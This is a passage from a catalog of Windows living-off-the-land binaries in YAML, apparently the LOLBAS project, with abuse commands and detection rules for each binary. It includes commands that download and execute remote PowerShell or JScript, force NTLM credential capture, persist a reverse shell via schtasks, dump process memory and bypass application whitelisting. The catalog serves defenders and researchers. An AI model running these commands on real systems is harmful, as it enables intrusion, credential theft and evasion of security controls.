Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe Detection: - IOC: Replace.exe retrieving files from remote server - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml Resources: - Link: https://twitter.com/elceef/status/986334113941655553 - Link: https://twitter.com/elceef/status/986842299861782529 Acknowledgement: - Person: elceef Handle: '@elceef' ================================================ FILE: yml/OSBinaries/Reset.yml ================================================ --- Name: Reset.exe Description: Remote Desktop Services Reset Utility Author: Matan Bahar Created: 2025-07-31 Commands: - Command: reset.exe session Description: Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it. Usecase: Execute an arbitrary executable via trusted system executable. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Rename Full_Path: - Path: c:\windows\system32\reset.exe - Path: c:\windows\syswow64\reset.exe Detection: - IOC: reset.exe being executed and executes rwinsta.exe outside of its normal path of c:\windows\system32\ or c:\windows\syswow64\ Acknowledgement: - Person: Matan Bahar Handle: '@Bl4ckShad3' ================================================ FILE: yml/OSBinaries/Rpcping.yml ================================================ --- Name: Rpcping.exe Description: Used to verify rpc connection Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Usecase: Capture credentials on a non-standard port Category: Credentials Privileges: User MitreID: T1003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set). Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port Category: Credentials Privileges: User MitreID: T1187 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml Resources: - Link: https://github.com/vysec/RedTips - Link: https://twitter.com/vysecurity/status/974806438316072960 - Link: https://twitter.com/vysecurity/status/873181705024266241 - Link: https://twitter.com/splinter_code/status/1421144623678988298 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Vincent Yiu Handle: '@vysecurity' - Person: Antonio Cocomazzi Handle: '@splinter_code' - Person: ap Handle: '@decoder_it' ================================================ FILE: yml/OSBinaries/Rundll32.yml ================================================ --- Name: Rundll32.exe Description: Used by Windows to execute dll files Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rundll32.exe {PATH},EntryPoint Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute. Usecase: Execute DLL file Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe {PATH_SMB:.dll},EntryPoint Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute. Usecase: Execute DLL from SMB share. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - Command: rundll32 "{PATH}:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe -sta {CLSID} Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml - IOC: Outbount Internet/network connections made from rundll32 - IOC: Suspicious use of cmdline flags such as -sta Resources: - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ - Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/ - Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md - Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 - Link: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: Jimmy Handle: '@bohops' - Person: Sailay Handle: '@404death' - Person: Martin Ingesen Handle: '@Mrtn9' ================================================ FILE: yml/OSBinaries/Runexehelper.yml ================================================ --- Name: Runexehelper.exe Description: Launcher process Author: Grzegorz Tworek Created: 2022-12-13 Commands: - Command: runexehelper.exe {PATH_ABSOLUTE:.exe} Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.' Usecase: Executes arbitrary code Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml - IOC: c:\windows\system32\runexehelper.exe is run - IOC: Existence of runexewithargs_output.txt file Resources: - Link: https://twitter.com/0gtweet/status/1206692239839289344 Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ================================================ FILE: yml/OSBinaries/Runonce.yml ================================================ --- Name: Runonce.exe Description: Executes a Run Once Task that has been configured in the registry Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Runonce.exe /AlternateShellStartup Description: Executes a Run Once Task that has been configured in the registry. Usecase: Persistence, bypassing defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml - Elastic: https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml - IOC: Registy key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY Resources: - Link: https://twitter.com/pabraeken/status/990717080805789697 - Link: https://cmatskas.com/configure-a-runonce-task-on-windows/ Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSBinaries/Runscripthelper.yml ================================================ --- Name: Runscripthelper.exe Description: Execute target PowerShell script Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder} Description: Execute the PowerShell script with .txt extension Usecase: Bypass constrained language mode and execute Powershell script Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Event ID 4104 - Microsoft-Windows-PowerShell/Operational - IOC: Event ID 400 - Windows PowerShell Resources: - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' ================================================ FILE: yml/OSBinaries/Sc.yml ================================================ --- Name: Sc.exe Description: Used by Windows to manage services Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice Description: Creates a new service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName} Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml - IOC: Unexpected service creation - IOC: Unexpected service modification Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Schtasks.yml ================================================ --- Name: Schtasks.exe Description: Schedule periodic tasks Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}" Description: Create a recurring task to execute every minute. Usecase: Create a recurring task to keep reverse shell session(s) alive Category: Execute Privileges: User MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute Privileges: Administrator MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml - IOC: Suspicious task creation events Resources: - Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/ ================================================ FILE: yml/OSBinaries/Scriptrunner.yml ================================================ --- Name: Scriptrunner.exe Description: Execute binary through proxy binary to evade defensive counter measures Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Scriptrunner.exe -appvscript {PATH:.exe} Description: Executes executable Usecase: Execute binary through proxy binary to evade defensive counter measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd} Description: Executes cmd file from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Remote - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml - IOC: Scriptrunner.exe should not be in use unless App-v is deployed Resources: - Link: https://twitter.com/KyleHanslovan/status/914800377580503040 - Link: https://twitter.com/NickTyrer/status/914234924655312896 - Link: https://github.com/MoooKitty/Code-Execution Acknowledgement: - Person: Nick Tyrer Handle: '@nicktyrer' ================================================ FILE: yml/OSBinaries/Setres.yml ================================================ --- Name: Setres.exe Description: Configures display settings Author: Grzegorz Tworek Created: 2022-10-21 Commands: - Command: setres.exe -w 800 -h 600 Description: Sets the resolution and then launches 'choice' command from the working directory. Usecase: Executes arbitrary code Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml - IOC: Unusual location for choice.exe file - IOC: Process created from choice.com binary - IOC: Existence of choice.cmd file Resources: - Link: https://twitter.com/0gtweet/status/1583356502340870144 Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ================================================ FILE: yml/OSBinaries/SettingSyncHost.yml ================================================ --- Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization Author: Elliot Killick Created: 2021-08-26 Commands: - Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe} Description: Execute file specified in %COMSPEC% Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat} Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml - IOC: SettingSyncHost.exe should not be run on a normal workstation Resources: - Link: https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/ Acknowledgement: - Person: Adam Handle: '@hexacorn' - Person: Elliot Killick Handle: '@elliotkillick' ================================================ FILE: yml/OSBinaries/Sftp.yml ================================================ --- Name: Sftp.exe Description: sftp.exe is a Windows command-line utility that uses the Secure File Transfer Protocol (SFTP) to securely transfer files between a local machine and a remote server. Author: Swachchhanda Shrawan Poudel Created: 2025-05-13 Commands: - Command: sftp -o ProxyCommand="{CMD}" . Description: "Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe." Usecase: Proxy execution of specified command, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\OpenSSH\sftp.exe Detection: - IOC: sftp.exe executions with ProxyCommand on the command line - IOC: sftp.exe spawning ssh.exe with ProxyCommand on the command line - Sigma: https://github.com/SigmaHQ/sigma/pull/5414/files Resources: - Link: https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/ Acknowledgement: - Person: Swachchhanda Shrawan Poudel Handle: '@_swachchhanda_' ================================================ FILE: yml/OSBinaries/Sigverif.yml ================================================ --- Name: Sigverif.exe Description: File Signature Verification utility to verify digital signatures of files Author: Moshe Kaplan Created: 2021-11-08 Commands: - Command: sigverif.exe Description: Launch sigverif.exe GUI, click 'Advanced', specify arbitrary executable path as 'log file name', then click 'View Log' to execute the binary. Usecase: Execute arbitrary programs through a trusted Microsoft-signed binary to bypass application whitelisting. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 10, Windows 11 Tags: - Execute: EXE - Application: GUI Full_Path: - Path: C:\Windows\System32\sigverif.exe - Path: C:\Windows\SysWOW64\sigverif.exe Detection: - IOC: sigverif.exe spawning unexpected child processes Resources: - Link: https://twitter.com/0gtweet/status/1457676633809330184 - Link: https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' - Person: Adam Handle: '@Hexacorn' ================================================ FILE: yml/OSBinaries/Ssh.yml ================================================ --- Name: ssh.exe Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices. Author: Akshat Pradhan Created: 2021-11-08 Commands: - Command: ssh localhost "{CMD}" Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines. Usecase: Execute specified command, can be used for defense evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - Execute: CMD - Command: ssh -o ProxyCommand="{CMD}" . Description: Executes specified command from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml - IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe. - IOC: command line arguments specifying execution. Resources: - Link: https://gtfobins.github.io/gtfobins/ssh/ Acknowledgement: - Person: Akshat Pradhan - Person: Felix Boulet ================================================ FILE: yml/OSBinaries/Stordiag.yml ================================================ --- Name: Stordiag.exe Description: Storage diagnostic tool Author: 'Eral4m' Created: 2021-10-21 Commands: - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 Tags: - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml - IOC: systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\ Resources: - Link: https://twitter.com/eral4m/status/1451112385041911809 Acknowledgement: - Person: Eral4m Handle: '@eral4m' - Person: Ekitji Handle: '@eki_erk' ================================================ FILE: yml/OSBinaries/Syncappvpublishingserver.yml ================================================ --- Name: SyncAppvPublishingServer.exe Description: Used by App-v to get App-v server lists Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Example command on how inject Powershell code into the process Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed Resources: - Link: https://twitter.com/monoxgas/status/895045566090010624 Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ================================================ FILE: yml/OSBinaries/Tar.yml ================================================ --- Name: Tar.exe Description: Used by Windows to extract and create archives. Author: Brian Lucero Created: 2023-01-30 Commands: - Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder} Description: Compress one or more files to an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression - Command: tar -xf {PATH}:ads Description: Decompress a compressed file from an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression - Command: tar -xf {PATH_SMB:.tar} Description: Extracts archive.tar from the remote (internal) host to the current host. Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression Full_Path: - Path: C:\Windows\System32\tar.exe - Path: C:\Windows\SysWOW64\tar.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml - IOC: tar.exe extracting files from a remote host within the environment - IOC: Abnormal processes spawning tar.exe - IOC: tar.exe interacting with alternate data streams (ADS) Resources: - Link: https://twitter.com/Cyber_Sorcery/status/1619819249886969856 Acknowledgement: - Person: Brian Lucero Handle: '@Cyber_Sorcery' - Person: Avester Fahimipour ================================================ FILE: yml/OSBinaries/Ttdinject.yml ================================================ --- Name: Ttdinject.exe Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) Author: Maxime Nadeau Created: 2020-05-12 Commands: - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}" Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}" Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1909 and below Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml - IOC: Parent child relationship. Ttdinject.exe parent for executed command - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process Resources: - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880 Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: Maxime Nadeau Handle: '@m_nad0' ================================================ FILE: yml/OSBinaries/Tttracer.yml ================================================ --- Name: Tttracer.exe Description: Used by Windows 1809 and newer to Debug Time Travel Author: Oddvar Moe Created: 2019-11-05 Commands: - Command: tttracer.exe {PATH_ABSOLUTE:.exe} Description: Execute specified executable from tttracer.exe. Requires administrator privileges. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - Execute: EXE - Command: TTTracer.exe -dumpFull -attach {PID} Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID Category: Dump Privileges: Administrator MitreID: T1003 OperatingSystem: Windows 10 1809 and newer, Windows 11 Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - IOC: Parent child relationship. Tttracer parent for executed command Resources: - Link: https://twitter.com/oulusoyum/status/1191329746069655553 - Link: https://twitter.com/mattifestation/status/1196390321783025666 - Link: https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html Acknowledgement: - Person: Onur Ulusoy Handle: '@oulusoyum' - Person: Matt Graeber Handle: '@mattifestation' ================================================ FILE: yml/OSBinaries/Unregmp2.yml ================================================ --- Name: Unregmp2.exe Description: Microsoft Windows Media Player Setup Utility Author: Wade Hickey Created: 2021-12-06 Commands: - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP" Description: Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path 